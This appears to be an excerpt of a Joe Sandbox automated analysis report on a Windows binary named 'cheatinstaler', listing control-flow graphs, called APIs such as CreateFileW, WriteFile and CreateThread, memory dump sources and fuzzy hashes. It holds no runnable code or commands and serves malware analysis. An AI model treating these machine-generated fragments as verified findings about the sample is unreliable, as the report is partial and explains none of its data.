                                                                                  control_flow_graph 3765 7ff7545524c0-7ff7545524fb 3766 7ff7545524fd-7ff754552504 3765->3766 3767 7ff754552506 3765->3767 3766->3767 3768 7ff754552509-7ff754552578 3766->3768 3767->3768 3769 7ff75455257d-7ff7545525a8 CreateFileW 3768->3769 3770 7ff75455257a 3768->3770 3771 7ff7545525ae-7ff7545525de GetLastError call 7ff754556a0c 3769->3771 3772 7ff754552688-7ff75455268d 3769->3772 3770->3769 3781 7ff75455262c 3771->3781 3782 7ff7545525e0-7ff75455262a CreateFileW GetLastError 3771->3782 3773 7ff754552693-7ff754552697 3772->3773 3775 7ff754552699-7ff75455269c 3773->3775 3776 7ff7545526a5-7ff7545526a9 3773->3776 3775->3776 3778 7ff75455269e 3775->3778 3779 7ff7545526ab-7ff7545526af 3776->3779 3780 7ff7545526cf-7ff7545526e3 3776->3780 3778->3776 3779->3780 3783 7ff7545526b1-7ff7545526c9 SetFileTime 3779->3783 3784 7ff75455270c-7ff754552735 call 7ff754572320 3780->3784 3785 7ff7545526e5-7ff7545526f0 3780->3785 3786 7ff754552632-7ff75455263a 3781->3786 3782->3786 3783->3780 3788 7ff754552708 3785->3788 3789 7ff7545526f2-7ff7545526fa 3785->3789 3790 7ff75455263c-7ff754552653 3786->3790 3791 7ff754552673-7ff754552686 3786->3791 3788->3784 3793 7ff7545526fc 3789->3793 3794 7ff7545526ff-7ff754552703 call 7ff7545420b0 3789->3794 3795 7ff75455266e call 7ff75457220c 3790->3795 3796 7ff754552655-7ff754552668 3790->3796 3791->3773 3793->3794 3794->3788 3795->3791 3796->3795 3797 7ff754552736-7ff75455273b call 7ff754577904 3796->3797
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3536497005-0
                                                                                  • Opcode ID: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                  • Instruction ID: 97dc57e4239a390f1da74d73ebde8f96fc7b3ba859d6a3415d5110ebeb830ce0
                                                                                  • Opcode Fuzzy Hash: 3a28dd0dcfd7b89b689d9fe25ecc7464786bdc3a32dccfb94d5fbab1a7314792
                                                                                  • Instruction Fuzzy Hash: F461E462A1864185E7249F2AE4903BEA7A1FB847A8F941334EFAD07AD4DF3DD054CB14

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: GlobalResource$Object$AllocBitmapDeleteGdipLoadLock$CreateFindFreeFromSizeofUnlock
                                                                                  • String ID: ]
                                                                                  • API String ID: 2347093688-3352871620
                                                                                  • Opcode ID: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction ID: 3ef0f3980618c4abdf461477392d60d43e28924f1e274441a32c98885ffaed11
                                                                                  • Opcode Fuzzy Hash: 2f79d63664e457f963bfbd157e1c525b341384e02eb8e860e1f42d2dee528bbf
                                                                                  • Instruction Fuzzy Hash: A1116321B0968251FA64FF23A6F9279E791AF88BD5F8C0434DD5D07B95DE2CE8048620

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$DialogDispatchPeekTranslate
                                                                                  • String ID:
                                                                                  • API String ID: 1266772231-0
                                                                                  • Opcode ID: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction ID: 1d803838e3231c83dc947c3e8f6d8e725fec86dbaa8ef7908ccd355b64462f64
                                                                                  • Opcode Fuzzy Hash: 8f901ab8bb575df3ccfb48a5cb3294f091b017f84468599a2020223c8e70b7dc
                                                                                  • Instruction Fuzzy Hash: 39F0EC26A3899292FB50AF22E8F9A36A361FFD0706FC85431E54E41854DF2CD908CB20

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                  • String ID: EDIT
                                                                                  • API String ID: 4243998846-3080729518
                                                                                  • Opcode ID: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction ID: bb308ddfe7e99f00ecc71c76c056239c74b2ad0df5fd4d24c95c035540fbd718
                                                                                  • Opcode Fuzzy Hash: 5198dd27efd6ef2cfe81d4e1a42d30dc263c523227a297f5f4c02164b2b5e029
                                                                                  • Instruction Fuzzy Hash: 00018662B18A8391FA20BF23E8B47B5A390BF98740FCC0131C94D0A654DE2CD149C660

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 4075 7ff754552ce0-7ff754552d0a 4076 7ff754552d0c-7ff754552d0e 4075->4076 4077 7ff754552d13-7ff754552d1b 4075->4077 4078 7ff754552ea9-7ff754552ec4 call 7ff754572320 4076->4078 4079 7ff754552d2b 4077->4079 4080 7ff754552d1d-7ff754552d28 GetStdHandle 4077->4080 4082 7ff754552d31-7ff754552d3d 4079->4082 4080->4079 4084 7ff754552d86-7ff754552da2 WriteFile 4082->4084 4085 7ff754552d3f-7ff754552d44 4082->4085 4088 7ff754552da6-7ff754552da9 4084->4088 4086 7ff754552d46-7ff754552d7a WriteFile 4085->4086 4087 7ff754552daf-7ff754552db3 4085->4087 4086->4088 4089 7ff754552d7c-7ff754552d82 4086->4089 4090 7ff754552ea2-7ff754552ea6 4087->4090 4091 7ff754552db9-7ff754552dbd 4087->4091 4088->4087 4088->4090 4089->4086 4092 7ff754552d84 4089->4092 4090->4078 4091->4090 4093 7ff754552dc3-7ff754552dd8 call 7ff75454b4f8 4091->4093 4092->4088 4096 7ff754552e1e-7ff754552e6d call 7ff75457797c call 7ff75454129c call 7ff75454bca8 4093->4096 4097 7ff754552dda-7ff754552de1 4093->4097 4096->4090 4108 7ff754552e6f-7ff754552e86 4096->4108 4097->4082 4099 7ff754552de7-7ff754552de9 4097->4099 4099->4082 4101 7ff754552def-7ff754552e19 4099->4101 4101->4082 4109 7ff754552e9d call 7ff75457220c 4108->4109 4110 7ff754552e88-7ff754552e9b 4108->4110 4109->4090 4110->4109 4111 7ff754552ec5-7ff754552ecb call 7ff754577904 4110->4111
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                  • Instruction ID: 069681b02f61faadee6248585d006f9b52d986714ac7f97b232d439097ca242f
                                                                                  • Opcode Fuzzy Hash: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                  • Instruction Fuzzy Hash: EF51C362A1964292FA54AF26D8A47BAA350FB44B94FD80131FA0D07AD4DF3CE585C720

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                  • String ID:
                                                                                  • API String ID: 3750147219-0
                                                                                  • Opcode ID: fc1dbc180cc96f95be2c8896ee01285d2f87486fd65e1fc7a35e6e120e6522b5
                                                                                  • Instruction ID: 5fd91142b847e4643dfee30f3f1250e6b1d9ec3594d7e680710b7c64409021a3
                                                                                  • Opcode Fuzzy Hash: fc1dbc180cc96f95be2c8896ee01285d2f87486fd65e1fc7a35e6e120e6522b5
                                                                                  • Instruction Fuzzy Hash: 6851B462F1465285FF00AF76D8A42ADA362BF45BE4FD80631EA1C167D6DF6CD540C320
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                  • String ID:
                                                                                  • API String ID: 1452418845-0
                                                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction ID: a4a6000f351bfdafaa1318f7714c4036b0349d213423ef8cf6aec2f02ea94c0b
                                                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction Fuzzy Hash: 43311821E0820242FA69BF6794F53B9A391BF413C4FDC5434EA4E4B6D3DE2CA645C271
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2359106489-0
                                                                                  • Opcode ID: 4afa93bd4a700d257cdc7d509a41c9c5d78617ffec5cec458594de29b09af307
                                                                                  • Instruction ID: 33e8d05455822aa80aa2da9a1fce7d2fa4f4dbec280943c01475653225351e52
                                                                                  • Opcode Fuzzy Hash: 4afa93bd4a700d257cdc7d509a41c9c5d78617ffec5cec458594de29b09af307
                                                                                  • Instruction Fuzzy Hash: CC318262E1C68281EA60AF26B4E42B9E351FB887A0FD80231FB9D47695DF3CD5458620
APIs
• GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580B91
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580BF3
• WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580C2D
• FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580C57
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ByteCharEnvironmentMultiStringsWide$Free
• String ID:
• API String ID: 1557788787-0
• Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
• Instruction ID: ca6fb63a0ad483258f315fc71abb8270dba669d66e0406a12acc1d6d17d2c388
• Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
• Instruction Fuzzy Hash: 54215E31B19B5181F664AF13A4A0029F6A4FBA8FD0F9D4134DE8E63BA4DF3CE4528314
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
• Instruction ID: e057f497bac6e0fe9857ba95e08ee0bcb098cad169c1c61c5795c9638e0a3a97
• Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
• Instruction Fuzzy Hash: 4D216221A0C542C1EA686F13A4A02B9E3A0FF45B94FED4531FA5D46684DF7CD8858F72
APIs
  • Part of subcall function 00007FF75455ECD8: ResetEvent.KERNEL32 ref: 00007FF75455ECF1
  • Part of subcall function 00007FF75455ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF75455ED07
• ReleaseSemaphore.KERNEL32 ref: 00007FF75455E974
• FindCloseChangeNotification.KERNELBASE ref: 00007FF75455E993
• DeleteCriticalSection.KERNEL32 ref: 00007FF75455E9AA
• CloseHandle.KERNEL32 ref: 00007FF75455E9B7
  • Part of subcall function 00007FF75455EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA63
  • Part of subcall function 00007FF75455EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA6E
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
• String ID:
• API String ID: 2143293610-0
• Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
• Instruction ID: 24b46e6a7b31bae6b3b0d5fc7cf5510707f8fd0fdf336760e3e44efb4985916c
• Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
• Instruction Fuzzy Hash: 8701ED32A19A91D2E658EF22E5A42ADB331FB84B90F544031EB5D03665CF39E4B58750
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: Thread$CreatePriority
• String ID: CreateThread failed
• API String ID: 2610526550-3849766595
• Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
• Instruction ID: e5d46c1daa7ca417440810b6076aa3b8ff2c260be9b456c876a8645b55e29300
• Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
• Instruction Fuzzy Hash: 4C115E32A18A4282E710EF12E8A11B9F360FB84B95F9C4131EA4D07668DF3CE545C720
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: DirectoryInitializeMallocSystem
• String ID: riched20.dll
• API String ID: 174490985-3360196438
• Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
• Instruction ID: 7cd8dec6b71e09e3fb8471a58ce46e01842eaebff516b0134aeca205a4817168
• Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
• Instruction Fuzzy Hash: 2FF06272618A4182EB00AF62F4A41AEF3A0FF88755FC80135EA8D42B54DF7CE14DCB10
APIs
  • Part of subcall function 00007FF75456853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF75456856C
  • Part of subcall function 00007FF75455AAE0: LoadStringW.USER32 ref: 00007FF75455AB67
  • Part of subcall function 00007FF75455AAE0: LoadStringW.USER32 ref: 00007FF75455AB80
  • Part of subcall function 00007FF754541FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF754541FFB
  • Part of subcall function 00007FF75454129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF754541396
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7545701BB
• _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7545701C1
• SendDlgItemMessageW.USER32 ref: 00007FF7545701F2
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
• String ID:
• API String ID: 3106221260-0
• Opcode ID: bd759a4fa0bd9309ccea4b20fd132112b516600e79edc36bc9085e82c2e5f9f2
• Instruction ID: 305c05df4e82614ace8815daf7cef1a2efe27f1684b599e8806225c3fd549d9d
• Opcode Fuzzy Hash: bd759a4fa0bd9309ccea4b20fd132112b516600e79edc36bc9085e82c2e5f9f2
• Instruction Fuzzy Hash: B451B162F1564256FB10BFA2D4A52FDA362AB85BC4F980135EE0D5B7D6DE2CE500C360
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: CreateFile$_invalid_parameter_noinfo_noreturn
• String ID:
• API String ID: 2272807158-0
• Opcode ID: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
• Instruction ID: 485affee4a94fe68e040632725e5200b879ea757e291534e1bddd0760eac40af
• Opcode Fuzzy Hash: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
• Instruction Fuzzy Hash: 7841A67260878182EA14AF16E4942B9B3A1FB847B4F985734FB6D07AD5CF3CD4908710
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
